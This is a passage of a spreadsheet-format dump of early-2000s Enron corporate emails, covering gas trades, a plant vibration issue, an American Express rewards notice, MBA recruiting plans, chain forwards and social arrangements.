ennis; Steele, Patricia; Trevino, Linda; Vasquez, Josue; Aldinger, William;=_x000D_
 Collins, Marion; Conklin, Jacob; Coon, Galen; Cooper, Tim; Cramer, James; =_x000D_
Howard, Jack; Laferla, Lynda ; Phillips, Mary; Rivers, Cynthia; Betancourt,=_x000D_
 Ramona ; Black, Legale ; Draemer, Mary ; Kuehl, Toby; Matheson, Maggie; Me=_x000D_
deles, Gerry; Skertich, Gerald; Studebaker, James ; Summers, Toby; Adams, J=_x000D_
ean; Benningfield, Robert; Forbish, Sherry; Greaney, Chris; Hibbard, Scott;=_x000D_
 Janzen, Randy; Linhart, Joe; McDaniel, Janet; Scurlock, Debra; Sturr, Kath=_x000D_
y; Vaughan, Cara; Woodson, Harry; Giambrone, Laura; Hernandez, Bert; McEvoy=_x000D_
, Christine; Miller, Beverly; Miller, Chris L; Minter, Tracy; Mulligan, Amy=_x000D_
; Ward, Linda_x000D_
Cc:=09Nacey, Sheila; Blair, Lynn_x000D_
Subject:=09FW: Scheduled Qty Report_x000D_
_x000D_
FYI:_x000D_
_x000D_
_x000D_
Teams--Let me know if you've received calls from unhappy shippers regarding=_x000D_
 the removal of the "Scheduled Quantity reports for Shippers" in TMS!!  We'=_x000D_
ve been getting miscellaneous messages that customers are unhappy with this=_x000D_
 change--need some immediate feedback!  Thks! Sheila</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 04:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Wheatland Vibration Problem</t>
  </si>
  <si>
    <t xml:space="preserve">Ben,_x000D_
_x000D_
I spoke to Ross Newlin regarding the vibration problems.  The Westinghouse _x000D_
engineers corrected the problem to the point that it was below alarm limits.  _x000D_
There is no plan to repair the problem during the November outage since it _x000D_
requires significant run time and the economics are not there for a November _x000D_
run.  However, West. has committed to come back to the plant in January when _x000D_
we can schedule some run time.  Ross will try to track down the minutes of _x000D_
the outage planning meeting to document this.  I'll forward them to you when _x000D_
I get them._x000D_
_x000D_
_x000D_
Rick_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Benjamin Rogers@ECT_x000D_
10/25/2000 10:36 AM_x000D_
To: Richard Broussard/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Rick:_x000D_
Here are some questions we are working on where we need a little assistance.  _x000D_
Check question 2.14 and any others.  Thanks!_x000D_
Ben_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 1 Jun 2000 11:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Friday, June 2</t>
  </si>
  <si>
    <t>I will be leaving the office at approx. 3:45 pm.  If we need to meet, please _x000D_
see me before that time.  Sara</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 14:20:27 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Membership rewards announcement - Pls distribute 1/18/02</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Enron General Announcements  _x000D_
Sent:	Friday, January 18, 2002 3:30 PM_x000D_
To:	DL-GA-all_domestic_x000D_
Subject:	Membership rewards announcement - Pls distribute 1/18/02_x000D_
_x000D_
AMERICAN EXPRESS MEMBERSHIP REWARDS ANNOUNCEMENT_x000D_
_x000D_
All Membership Rewards accounts were cancelled when American Express cancelled the Enron/American Express Corporate Cards.  To redeem Membership Rewards Points earned, the Corporate Card Account must be paid to a zero balance.  Upon paying the account  to a zero balance you have two options to redeem the points:_x000D_
_x000D_
1)  Establish a Personal Card account with American Express and have the points that were accrued on the Corporate Card transferred to the Personal Card.  To apply for a Personal Card over the phone you can call 1-800-The-Card (843-2273).  Cardmembers must transfer Membership Rewards points to the new card by March 1, 2002._x000D_
_x000D_
2) If you do not have a Personal Card and do not want to establish a Personal Card, you should call the American Express Membership Rewards Redemption Line at 1-800-297-3276 and ask to speak with the Executive Consumer Relations Desk.  You should identify yourself as an Enron employee and request that your Membership Rewards be reinstated.  Reinstated points must be redeemed before March 1, 2002.  _x000D_
_x000D_
For information on all travel services, please contact Tracy Ramsey at (713) 853-6457.  </t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 02:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'derek.bailey@enron.com'})</t>
  </si>
  <si>
    <t>Re: Rebook</t>
  </si>
  <si>
    <t xml:space="preserve">Done_x000D_
_x000D_
DG    3-9573_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Derek Bailey @ ENRON                           01/04/2001 10:43 AM_x000D_
	_x000D_
_x000D_
To: Darron C Giron/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Rebook_x000D_
_x000D_
Please rebook NW2862.8,.9 to Bank of America, National Association _x000D_
(BANKAMENAT)._x000D_
_x000D_
Thank you:_x000D_
_x000D_
Derek_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 12:25:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'judy.townsend@enron.com', 'andrea.ring@enron.com', 'f..brawner@enron.com', 'chuck.ames@enron.com'})</t>
  </si>
  <si>
    <t>FW: Firm Gas General Terms and Conditions</t>
  </si>
  <si>
    <t>fyi_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Vickers, Frank  _x000D_
Sent:	Wednesday, January 30, 2002 4:00 PM_x000D_
To:	Tycholiz, Barry; Neal, Scott; Shively, Hunter S.; Martin, Thomas A.; Bryan, Gary; Larubbio, Morris; Ward, Kim; Lagrasta, Fred; McCaffrey, Deirdre; Frihart, Bryant; Mims, Patrice L._x000D_
Subject:	FW: Firm Gas General Terms and Conditions_x000D_
_x000D_
_x000D_
I am sure that I have accidentally left off someone that should receive a copy of this, if so please forward it.  Legal will be providing a "Contract 101" class at some point to discuss these documents as well as Masters, GISB's, etc.  Please review this material and provide me with any material comments that you may have.  I will aggregate any comments and coordinate with legal._x000D_
_x000D_
_x000D_
Frank_x000D_
 -----Original Message-----_x000D_
From: 	Cook, Mary  _x000D_
Sent:	Wednesday, January 30, 2002 2:37 PM_x000D_
To:	'bryan.murtagh@ubsw.com'; Taylor, Mark E (Legal); St. Clair, Carol; Nemec, Gerald; Sager, Elizabeth; Hodge, Jeffrey T.; Davis, Angela; 'william.glass@ubsw.com'; 'lisa.feld@ubsw.com'; 'sanjeev.karkhanis@ubsw.com'; 'gary.riddell@ubsw.com'; 'jennifer.gabrielson@ubs.com'; 'david.maloy@ubsw.com'; 'jeff.stewart@ubsw.com'_x000D_
Cc:	Haedicke, Mark E.; Gonzalez, Esmeralda; Bradford, William S.; Vickers, Frank; Calger, Christopher F.; Kitchen, Louise_x000D_
Subject:	Firm Gas General Terms and Conditions_x000D_
_x000D_
_x000D_
Attached are clean and redline versions of the current draft of firm gas general terms and conditions to be traded online and over the counter and with or without collateral._x000D_
Interruptible gas general terms and conditions will follow today._x000D_
_x000D_
    _x000D_
_x000D_
    _x000D_
_x000D_
_x000D_
Esmeralda, please set up the above group, including cc addresses as a contact group:  UBS Gas Forms_x000D_
_x000D_
_x000D_
Cordially,_x000D_
Mary Cook_x000D_
Enron North America Corp._x000D_
1400 Smith, 38th Floor, Legal_x000D_
Houston, Texas 77002-7361_x000D_
(713) 345-7732_x000D_
(713) 646-3393 (fax)_x000D_
mary.cook@enron.com</t>
  </si>
  <si>
    <t>Fri, 18 Aug 2000 16:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'fpickel@tca-us.com'})</t>
  </si>
  <si>
    <t>frozenset({'jhartso@enron.com', 'jeff.dasovich@enron.com'})</t>
  </si>
  <si>
    <t>FW: WSCC price spikes / Van Vactor Oregon PUC testimony</t>
  </si>
  <si>
    <t>This is a paper on the recent WSCC price spikes by Sam Van Vactor of_x000D_
Economic Insight in Portland, Oregon.  Sam presented this to the Oregon PUC_x000D_
this past Monday._x000D_
_x000D_
Since it addresses the supply / demand situation as well as the California_x000D_
utility underscheduling behavior, I thought you'd like to see it._x000D_
_x000D_
Regards,_x000D_
Fred_x000D_
_x000D_
 Frederick H. Pickel, Ph.D_x000D_
 Vice President_x000D_
 Tabors Caramanis &amp; Associates_x000D_
 Los Angeles, California_x000D_
 &amp; Cambridge, Massachusetts_x000D_
 email: fpickel@tca-us.com_x000D_
 alternate email: fred.pickel@ALUM.mit.edu_x000D_
 tel +1 (323) 937-7920_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Sam Van Vactor [mailto:svv@econ.com]_x000D_
Sent: Wednesday, August 16, 2000 9:30 AM_x000D_
To: fpickel@tca-us.com_x000D_
Subject: spikes_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - att1.htm_x000D_
 - Spikes.PDF</t>
  </si>
  <si>
    <t>Tue, 21 Dec 1999 08:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mike.smith@enron.com', 'sue.nord@enron.com', 'doug.wood@enron.com', 'elizabeth.linnell@enron.com', 'john.palmisano@enron.com', 'cynthia.sandherr@enron.com', 'kelly.kimberly@enron.com', 'james.steffes@enron.com', 'robert.frank@enron.com', 'mark.palmer@enron.com', 'terence.thorn@enron.com', 'kathleen.wagner@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Msg. from Rick Shapiro_x000D_
_x000D_
I know how eagerly everyone is awaiting the formation of the Resource _x000D_
Allocation Working group*.  Below is a brief description of the group's _x000D_
purpose and initial steps we will be taking.  I want to thank everyone in _x000D_
advance for what I know will be a successful effort._x000D_
_x000D_
What this group is about:       Identifying best practices within Public _x000D_
Affairs for prioritization of efforts and allocation of resources and _x000D_
documenting the best practices for implementation as soon as possible _x000D_
throughout Public Affairs._x000D_
_x000D_
How we're going to do it:  Quickly and efficiently._x000D_
_x000D_
Why we're doing this:  Because we have finite human and financial _x000D_
resources.... because we have an obligation to direct those finite resources _x000D_
to their highest and best use._x000D_
  _x000D_
When we're going to start this process:  Initial meeting in Houston, January _x000D_
7, 2000 from 8:00am - 11:00am (call in participation is perfectly acceptable)._x000D_
_x000D_
What's required for initial meeting:  A one page or less description of how _x000D_
your group prioritizes its efforts; how both human and financial resources _x000D_
are allocated, and how all of this fits within your budgeting process (should _x000D_
be distributed to all group members two (2) days prior to meeting)._x000D_
_x000D_
Finally:  I am attaching material that my group has used over the last year _x000D_
to implement a resource allocation/issue priortization process.  I will _x000D_
provide a more detailed explanation at the initial meeting.  Please feel free _x000D_
to call me if you have any questions before then._x000D_
_x000D_
*  You've either been nominated or selected, or volunteered for this working _x000D_
group.  Congratulations._x000D_
_x000D_
_x000D_
Copy of E:mail sent on 12/15/99_x000D_
Please read the attached memo from Rick Shapiro along with the attachments._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Copy of E:Mail Sent on 10/19/99_x000D_
Please see the attached Word document for directions on a new on-line _x000D_
procedure for RCR's.  All RCR requests must now be submitted on-line through _x000D_
the Project Tracking system.  To access the system, click on the first link _x000D_
below, and a new icon will be added to your Lotus Notes desktop (it has a _x000D_
picture of a globe).  (Don't click on the other two links, they'll be added _x000D_
automatically.)    If you have any problems accessing the system, please call _x000D_
me.  If you have any questions on entering the information, please call me or _x000D_
Ginger.  Thanks!!_x000D_
_x000D_
Click on this link  --&gt;     &gt; Gov Affairs_x000D_
 &gt; Projects_x000D_
 &gt; Contacts_x000D_
_x000D_
Instructions:  --&gt;  _x000D_
_x000D_
_x000D_
Copy of E:mail sent on 8/25/99_x000D_
Upon further reflection after the recent staff meeting, I have made the _x000D_
determination that any and allengagements of outside resources, e.g., outside _x000D_
counsel &amp; consultants, public relations firms, etc... must be approved _x000D_
through the Resource Commitment Review (RCR) process.  Accordingly, the $2500 _x000D_
trigger that had been in place is no longer.  To ensure that the process _x000D_
works in a more timely manner, I am creating weekly RCR meetings (Harry, Jim _x000D_
&amp; myself) at which all pending RCR's will be acted on.  I will deal with _x000D_
emergency RCR's as they may arise between the weekly meetings._x000D_
_x000D_
Bottom line, the RCR process is of enormous value to the group as it helps to _x000D_
document that we are properly focusing the company's resources in the places _x000D_
where it is of most value.  I firmly believe that whatever minor _x000D_
inconveniences this change will entail, they are minor in relationship to _x000D_
ensuring the success and credibility of the RCR process._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Memo sent on 3/18/99_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 01:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tim.carter@enron.com', 'dmw@mailandnews.com', 'barend.vanderhorst@enron.com', 'patrick.hanse@enron.com', 'snguyen@totalsafetyinc.com', 'timothy.murphy@enron.com', 'larry.valderrama@enron.com', 'kayne.coulter@enron.com', 'robertmun1@aol.com', 'j.kinser@enron.com', 'matthew.fleming@enron.com', 'olenger.pannell@enron.com', 'matt.lorenz@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: Why you don't drink till you pass out.....</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Larry F Campbell/NA/Enron on 08/28/2000 _x000D_
08:01 AM ---------------------------_x000D_
_x000D_
_x000D_
"An La" &lt;an1229@hotmail.com&gt; on 08/25/2000 09:10:07 AM_x000D_
To: lcampbel@enron.com, apnikko@yahoo.com, Blt0013@aol.com, _x000D_
catherinecao@cs.com, ckcao@aol.com, qla@houston.rr.com, minhduy@hotmail.com, _x000D_
hxdinh@hotmail.com, Huy.Dinh@enron.com, K3ITH277@aol.com, KHOA@thinklink.com, _x000D_
klchun@U.Arizona.EDU, koryn2@hotmail.com, knguyen@looksmart.net, _x000D_
melindango@yahoo.com, Paul_Shah@hotmail.com, stevenlee@myself.com, _x000D_
tula66@hotmail.com_x000D_
cc:  _x000D_
_x000D_
Subject: Fwd: Why you don't drink till you pass out....._x000D_
_x000D_
_x000D_
&gt;From: "thu nguyen" &lt;thunguyen2@hotmail.com&gt;_x000D_
&gt;To: an1229@hotmail.com, rickdrina@aol.com, lt76@altavista.com,_x000D_
&gt;monika0030@hotmail.com, PeterH.Nguyen@compaq.com, jredor@hotmail.com,_x000D_
&gt;johnnyopimpmd@yahoo.com, noela@raremedium.com, ptn@prucka.com,_x000D_
&gt;uyen01@hotmail.com_x000D_
&gt;Subject: Fwd: Why you don't drink till you pass out....._x000D_
&gt;Date: Thu, 24 Aug 2000 19:54:25 CDT_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;&gt;From: "Mindy Nguyen" &lt;mindy515@hotmail.com&gt;_x000D_
&gt;&gt;To: bigheadanthony@hotmail.com, Debra_Lee@Manulife-Venture.com,_x000D_
&gt;&gt;Elepanio@prodigy.net, HNguyen@houston.rr.com, monika0030@hotmail.com,_x000D_
&gt;&gt;thunguyen2@hotmail.com_x000D_
&gt;&gt;Subject: Fwd: Why you don't drink till you pass out....._x000D_
&gt;&gt;Date: Thu, 24 Aug 2000 05:40:13 GMT_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;_x000D_
&gt;&gt;&gt;From: D12eamGRL@aol.com_x000D_
&gt;&gt;&gt;To: bighead-antoine@communityconnect.com, xjkim@hotmail.com,_x000D_
&gt;&gt;&gt;mindy515@hotmail.com, natedoggybird@hotmail.com, Udabich@aol.com,_x000D_
&gt;&gt;&gt;thoa512@hotmail.com, tuan2three@hotmail.com_x000D_
&gt;&gt;&gt;Subject: Fwd: Why you don't drink till you pass out....._x000D_
&gt;&gt;&gt;Date: Wed, 23 Aug 2000 02:02:43 EDT_x000D_
&gt;&gt;&gt;_x000D_
&gt;&gt;&gt;_x000D_
_x000D_
_________________________________________________________________________x000D_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com_x000D_
_x000D_
Return-path: &lt;CMN123@cs.com&gt;_x000D_
From: CMN123@cs.com_x000D_
Full-name: CMN123_x000D_
Message-ID: &lt;ae.99cc0bd.26d41a25@cs.com&gt;_x000D_
Date: Tue, 22 Aug 2000 14:02:13 EDT_x000D_
Subject: Fwd: Why you don't drink till you pass out....._x000D_
To: juanaguinaga@hotmail.com, DNA7037@gateway.net, comptont@slu.edu, _x000D_
fflorez2@texas.net, burglars@flash.net, KLAPIANO@aol.com, Acee211@aol.com, _x000D_
michellinamoya@hotmail.com, tngo@txmedmgt.com, Armani5686@aol.com, _x000D_
D12eamGRL@aol.com, AzNcHk@aol.com, brandyortiz@hotmail.com, _x000D_
dennispunzalan@reliantenergy.com, jruff01@sprintspectrum.com, _x000D_
bvera@austin-safeplace.org_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; boundary="part2_66.6cb574c.26d41a25_boundary"_x000D_
X-Mailer: CompuServe 2000 32-bit sub 103_x000D_
_x000D_
_x000D_
_x000D_
Return-Path: &lt;baylor@texas.net&gt;_x000D_
Received: from  rly-yc01.mx.aol.com (rly-yc01.mail.aol.com [172.18.149.33]) _x000D_
by air-yc05.mail.aol.com (v75_b3.11) with ESMTP; Tue, 22 Aug 2000 13:20:37 _x000D_
-0400_x000D_
Received: from  mw1.texas.net (mw1.texas.net [206.127.30.11]) by _x000D_
rly-yc01.mx.aol.com (v75_b3.9) with ESMTP; Tue, 22 Aug 2000 13:19:38 -0400_x000D_
Received: from Devin.texas.net (tcnet01-006.houston.texas.net _x000D_
[216.166.44.6])          by mw1.texas.net (2.4/2.4) with SMTP   id MAA22583; _x000D_
Tue, 22 Aug 2000 12:19:18 -0500 (CDT)_x000D_
From: "J. Devin Stewart" &lt;baylor@texas.net&gt;_x000D_
To: "Chau Nguyen" &lt;CMN123@cs.com&gt;, "Carlos Verver" &lt;CRverver@aol.com&gt;,        _x000D_
"Huy Pham (E-mail)" &lt;hphamer@hotmail.com&gt;,        "Julie Shelton" _x000D_
&lt;jkshelton@email.msn.com&gt;,        "Tara Salinas" &lt;MsPriss700@aol.com&gt;, "Shane _x000D_
Currie" &lt;Mymate1@cs.com&gt;,        "Jamie Wilson" _x000D_
&lt;phunkyjamie@earthlink.net&gt;,        "Sohail Hooda" &lt;shooda@lycos.com&gt;,        _x000D_
"Thomas Watts" &lt;thomas@mmihouston.com&gt;,        "Robert Warren" _x000D_
&lt;warren107@hotmail.com&gt;_x000D_
Subject: Why you don't drink till you pass out....._x000D_
Date: Tue, 22 Aug 2000 12:13:42 -0500_x000D_
Message-ID: &lt;003e01c00c5c$52506960$062ca6d8@Devin.texas.net&gt;_x000D_
MIME-Version: 1.0_x000D_
Content-Type: multipart/mixed; _x000D_
boundary="----=_NextPart_000_003F_01C00C32.697A6160"_x000D_
X-Priority: 3 (Normal)_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2232.26_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4_x000D_
Importance: Normal_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - priceless2.jpg_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Apr 2000 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.allwein@enron.com', 'joan.veselack@enron.com', 'joann.collins@enron.com', 'angie.zeman@enron.com'})</t>
  </si>
  <si>
    <t>CES Intra day sales</t>
  </si>
  <si>
    <t>I just sold intra day gas to CES on CGAS and CNG.  The CGAS deal is number _x000D_
250938, the volume is 257, the delivery point is BG&amp;E, and the price is _x000D_
$3.53.  This deal is for 1 day only.  The CNG deal is 250897, the volume is _x000D_
51 to NIMO East and 211 to Peoples, and the price is $3.60._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 08:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ludkam@aol.com'})</t>
  </si>
  <si>
    <t>Stanford MBA Recruiting</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/08/2001 _x000D_
04:01 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
03/08/2001 11:21 AM_x000D_
To: Greg Whalley/HOU/ECT@ECT, Liz M Taylor/HOU/ECT@ECT_x000D_
cc: Vince J Kaminski/HOU/ECT@ECT, Celeste Roberts/HOU/ECT@ECT _x000D_
Subject: Stanford MBA Recruiting_x000D_
_x000D_
Greg,_x000D_
_x000D_
This is the agenda for the recruiting trip to Stanford next week._x000D_
_x000D_
Vince_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/08/2001 _x000D_
11:21 AM ---------------------------_x000D_
_x000D_
_x000D_
Althea Gordon@ENRON_x000D_
03/07/2001 04:30 PM_x000D_
To: vince.kaminski@enron.com, brad.romine@enron.com, brad.alford@enron.com, _x000D_
martin.lin@enron.com, theresa_riedman@enron.net, matt_harris@enron.net, _x000D_
michael.smythe@enron.net, benjamin.bell@enron.com, mauricio.mora@enron.com, _x000D_
celeste.roberts@enron.com_x000D_
cc: shirley.crenshaw@enron.com, paula.austin@enron.com, _x000D_
dolores.muzzy@enron.com, cathy.lira@enron.com, patricia.payton@enron.com _x000D_
Subject: Stanford MBA Recruiting_x000D_
_x000D_
Thank you for agreeing to participate in the Associate Program's recruiting _x000D_
efforts at Stanford Graduate School of Business.   _x000D_
_x000D_
_x000D_
The itinerary for the trip is as follows:_x000D_
_x000D_
Wednesday, March 14, 7:00 p.m. to 9:00 p.m. Dinner with students selected to _x000D_
interview _x000D_
       Il Fornaio, the Sala Del Canaletto Room _x000D_
       520 Cowper Street, Palo Alto _x000D_
       (650) 853-3888_x000D_
_x000D_
Thursday, March 15, 8:30 a.m. to 4:45 p.m.  Round 1 interviews for both _x000D_
Summer and Full Time Associates_x000D_
       Stanford GSB Career Services Center   _x000D_
       Interviewers:  _x000D_
       Theresa Riedman_x000D_
       Brad Romine_x000D_
       Brad Alford_x000D_
       Martin Lin_x000D_
       Michael Smythe - to be confirmed_x000D_
       Benjamin Bell - to be confirmed_x000D_
       Mauricio Mora - Greeter/Alternate Interviewer_x000D_
_x000D_
Thursday, March 15, 12:15 p.m. to 1:30 p.m. Lunch with Dean George Parker _x000D_
(Associate Dean of Academics) and _x000D_
       Sherrie Taguchi (Director of Career Services).  _x000D_
       Stanford GSB Career Services Center_x000D_
       We will be ordering lunch in._x000D_
       _x000D_
Friday, March 16, 8:00 a.m. to 12:00 p.m.*   Round 2 interviews for both _x000D_
Summer and Full Time Associates_x000D_
       Stanford GSB Career Services Center_x000D_
       Interviewers:_x000D_
       Vince Kaminski_x000D_
       Matthew Harris_x000D_
_x000D_
* Please note that this is an approximate time that will be based on the _x000D_
number of candidates who successfully pass Round 1 interviews on Thursday._x000D_
_x000D_
_x000D_
Your hotel information is as follows:_x000D_
_x000D_
       Stanford Park Hotel_x000D_
       100 El Camino Real_x000D_
       Menlo Park_x000D_
       (650) 322-1234_x000D_
_x000D_
Upon confirmation of your participation you will receive your hotel _x000D_
confirmation number.  In the event that you have not received your hotel _x000D_
confirmation number please contact my assistant, Cathy Lira, at x54049._x000D_
_x000D_
Attire for the trip will be business casual.  If you have any questions _x000D_
please feel free to give me a call at x53860.  In case of emergency (and _x000D_
during the trip itself) I can be reached at (713) 416-6250._x000D_
_x000D_
_x000D_
Thank you for your support of the program._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 06:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brown_mary_jo@lilly.com'})</t>
  </si>
  <si>
    <t>frozenset({'win.bischoff@ssmb.com', 'jterzuoli@ibjwhitehall.com', 'alfred.gilman@email.swmed.edu', 'kseifert@kcc.com', 'george.fisher@kodak.com', 'karen.n.horn@marsh.com', 'prendergast@mayo.edu', 'kenneth.lay@enron.com', 'scb@purdue.edu'})</t>
  </si>
  <si>
    <t>***PRESS RELEASE*** 82 Win Lilly Reintegration Scholarship</t>
  </si>
  <si>
    <t>The attached press release was issued over PR Newswire at 12:00 p.m. this_x000D_
afternoon._x000D_
_x000D_
(See attached file: Reintegration Scholarships-National.doc)_x000D_
_x000D_
 - Reintegration Scholarships-National.doc</t>
  </si>
  <si>
    <t>Mon, 26 Mar 2001 04:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lauragammell@hotmail.com'})</t>
  </si>
  <si>
    <t>I made reservations at the Red Cat Jazz Cafe, 924 Congress between Main and_x000D_
Travis for 7:00 p.m. tomorrow night.  One catch...if everyone is not there_x000D_
by 7:15 p.m. then they will yank our reservation because they have live_x000D_
music and need the tables or something sketchy like that.  Anyway, see you_x000D_
tomorrow...oh I included a reservation for Barbara so let me know if she_x000D_
can't make it._x000D_
_x000D_
_x000D_
&gt;From: Gerald.Nemec@enron.com_x000D_
&gt;To: lauragammell@hotmail.com_x000D_
&gt;Subject: Re:_x000D_
&gt;Date: Thu, 22 Mar 2001 11:00:21 -0600_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;That sound cool.  I will schedule it up._x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;                     "Laura Gammell"_x000D_
&gt;                     &lt;lauragammell@ho        To:     gerald.nemec@enron.com_x000D_
&gt;                     tmail.com&gt;              cc:_x000D_
&gt;                                             Subject:_x000D_
&gt;                     03/21/2001 11:58_x000D_
&gt;                     AM_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;Hey Gerald-_x000D_
&gt;Ryan's big birthday is coming up this Tuesday, March 27th...wanted to get_x000D_
&gt;some people together for a nice dinner downtown, around 7:00.  Please feel_x000D_
&gt;free to bring Barbara along too!  I still need to make reservations at a_x000D_
&gt;restaurant..if you can think of any place great, let me know.  Hope you_x000D_
&gt;guys_x000D_
&gt;can make it!_x000D_
&gt;_x000D_
&gt;ciao!_x000D_
&gt;__________________________________________________________________x000D_
&gt;Get your FREE download of MSN Explorer at http://explorer.msn.com_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
__________________________________________________________________x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 06:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kerry.roper@enron.com'})</t>
  </si>
  <si>
    <t>Re: Forecast for 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Got your note.  It's a little premature to forecast now - we will have a _x000D_
better idea by April 15 - our timeline for completing our look at a revenue _x000D_
model.  Can we delay until then?  We do have a monthly fee of $16,000 that we _x000D_
are receiving from Bridgeline that, while small, you could include in our _x000D_
revenue line to date.  I am not sure why it is not showing up as income.  _x000D_
Probably because we have been considered a cost center to date.  I suspect _x000D_
that the income is simply being recorded as an offset to one of our cost _x000D_
centers.  By copy of this memo to Brian Heinrich, could you and he figure out _x000D_
where that income is and classify it appropriately so that it shows as _x000D_
revenue?  Since our costs are fully allocated to business units, this should _x000D_
be pure margin.  Hey, you have to start somewhere!  _x000D_
_x000D_
I have a lunch meeting scheduled with Greg Piper on Friday this week. One of _x000D_
the items that I want to discuss with him is how we want to treat expenses _x000D_
that we are incurring while researching the feasibility of this business.  I _x000D_
don't have an answer for you today on what if any costs will not be allocated _x000D_
to the business units.  Next week I can give you more info on that.  _x000D_
_x000D_
_x000D_
From: Kerry Roper/ENRON@enronXgate on 04/03/2001 01:55 PM_x000D_
To: Sally Beck/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Forecast for 2001_x000D_
_x000D_
Sally,_x000D_
One of the things that Greg Piper has asked me to do is to take a look at the _x000D_
rest of the year and get each of the VP's to assess their margins and EBIT _x000D_
for the remainder of 2001.  For Energy Operations, that is usually very easy _x000D_
since there has been no revenues, and all of the costs are allocated out, so _x000D_
there should be zero EBIT if nothing changed.  Given your present direction, _x000D_
however, you may be generating some margin in 2001.  Do you have a feel for _x000D_
an amount I can put into our analysis and will 100% of your costs continue to _x000D_
be billed out or will some be applied to this new activity? I am hoping to _x000D_
put something together next week, so if you or a designate could let me know _x000D_
in a few days I would appreciate it. _x000D_
_x000D_
Kerry Roper (x5-4895)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 29 Aug 2001 12:20:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul.donnelly@bakeratlas.com'})</t>
  </si>
  <si>
    <t>FW: Reservation</t>
  </si>
  <si>
    <t xml:space="preserve">Paul,_x000D_
_x000D_
I think this bounced back to me.  Sorry.  Kim._x000D_
_x000D_
-----Original Message-----_x000D_
From: Watson, Kimberly _x000D_
Sent: Wednesday, August 29, 2001 11:23 AM_x000D_
To: 'paul.donnelly@bakeratlas.com'; 'janell_dye@hotmail.com';_x000D_
'dennis_dye@hotmail.com'; 'john.watson@pdq.net'_x000D_
Subject: FW: Reservation_x000D_
_x000D_
_x000D_
Hey guys,_x000D_
_x000D_
We got our first response to a Florence Hotel.  Please read this message and take a look at the attached links to their hotel website to get a feel for the location.  Janell and I think that it is close enough to the city center, but we are open to fresh eyes.  Let me know your thoughts.  I sent about 12 faxes this morning, this is the first to respond.  Janell has personally called about 8 hotels in Florence and they have all been fully booked.  _x000D_
_x000D_
Let me know what you think.  _x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
-----Original Message-----_x000D_
From: Hotel City - Florence [mailto:info@hotelcity.net]_x000D_
Sent: Wednesday, August 29, 2001 10:28 AM_x000D_
To: kwatson@the-spires.com_x000D_
Subject: Reservation_x000D_
_x000D_
_x000D_
Florence, 29 August 2001_x000D_
_x000D_
K.A.: Mrs Kim WATSON_x000D_
_x000D_
